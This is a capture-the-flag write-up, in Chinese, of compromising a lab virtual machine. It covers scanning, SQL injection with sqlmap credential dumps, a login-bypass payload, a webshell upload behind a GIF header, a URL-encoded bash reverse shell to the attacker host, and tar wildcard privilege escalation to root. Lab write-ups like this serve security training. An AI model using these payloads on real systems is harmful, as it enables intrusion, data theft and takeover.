kali:192.168.56.104
主机发现
arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:2c:4f:35 PCS Systemtechnik GmbH
192.168.56.113 08:00:27:aa:84:13 PCS Systemtechnik GmbH
靶机:192.168.56.113
端口扫描
nmap 192.168.56.113
22/tcp open ssh
80/tcp open http
目录扫描
gobuster dir -u http://192.168.56.113 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 51414]
/.php (Status: 403) [Size: 279]
/img (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
/modules (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
/careers (Status: 301) [Size: 318] [--> http://192.168.56.113/careers/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
/lib (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
/customer (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
/404.html (Status: 200) [Size: 5014]
/robots.txt (Status: 200) [Size: 32]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]
/employee (Status: 301) [Size: 319] [--> http://192.168.56.113/employee/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
发现比前几个quick系列多出来了employee目录
测试发现123@qq.com 和123@qq.com'#结果相同,123@qq.com'报错,说明存在sql注入
sqlmap跑一下请求包
sqlmap -l a.txt --batch --dbs
...
[*] `quick`
[*] information_schema
[*] mysql
[*] performance_schema
[*] syssqlmap -l a.txt --batch -D quick --tables
...
+-------+
| cars |
| users |
+-------+sqlmap -l a.txt --batch -D quick -T users --columns
+-----------------+-------------------------------------+
| Column | Type |
+-----------------+-------------------------------------+
| name | varchar(255) |
| role | enum('admin','employee','customer') |
| email | varchar(255) |
| id | int |
| password | varchar(255) |
| profile_picture | varchar(255) |
+-----------------+-------------------------------------+sqlmap -l a.txt --batch -D quick -T users -C "email,name,password,profile_picture" --dump+------------------------+--------------+--------------------+----------------------+
| email | name | password | profile_picture |
+------------------------+--------------+--------------------+----------------------+
| a.lucky@email.hmv | Anna Lucky | c1P35bcdw0mF3ExJXG | <blank> |
| andrew.speed@quick.hmv | Andrew Speed | o30VfVgts73ibSboUP | uploads/3_andrew.jpg |
+------------------------+--------------+--------------------+----------------------+
字段就dump了几条没发现有用的东西,密码也登不上
但是登录界面可以用万能密码登上去
1' or 1#
找到一个上传点
上传一句话木马时候提示
Invalid file type. Only JPEG, PNG, and GIF files are allowed.
添加一个GIF的文件头上传成功
根据数据库爆破出来的uploads/3_andrew.jpg猜测上传的头像位置在这
前面的数字试到2找到了文件位置
反弹shell
0=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.104%2F4567%20%200%3E%261'
www-data@quick4:/home$ ls
ls
andrew
coos
jeff
john
juan
lara
lee
mike
nick
user.txt
home目录下有user.txt
在查看进程的时候发现
CMD: UID=0 PID=26400 | /bin/bash /usr/local/bin/backup.sh
backup.sh有root权限
www-data@quick4:/var/www$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *
Linux提权系列 - tar - 掘金 (juejin.cn)
cd /var/www/html
echo "chmod u+s /usr/bin/bash" >shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"
bash -p
www-data@quick4:/var/www/html$ echo "chmod u+s /usr/bin/bash" >shell.sh
echo "chmod u+s /usr/bin/bash" >shell.sh
www-data@quick4:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
<l$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@quick4:/var/www/html$ echo "" > "--checkpoint=1"
echo "" > "--checkpoint=1"
www-data@quick4:/var/www/html$ bash =p
bash =p
bash: =p: No such file or directory
www-data@quick4:/var/www/html$ bash -p
bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
whoami]
bash: line 2: whoami]: command not found
whoami
root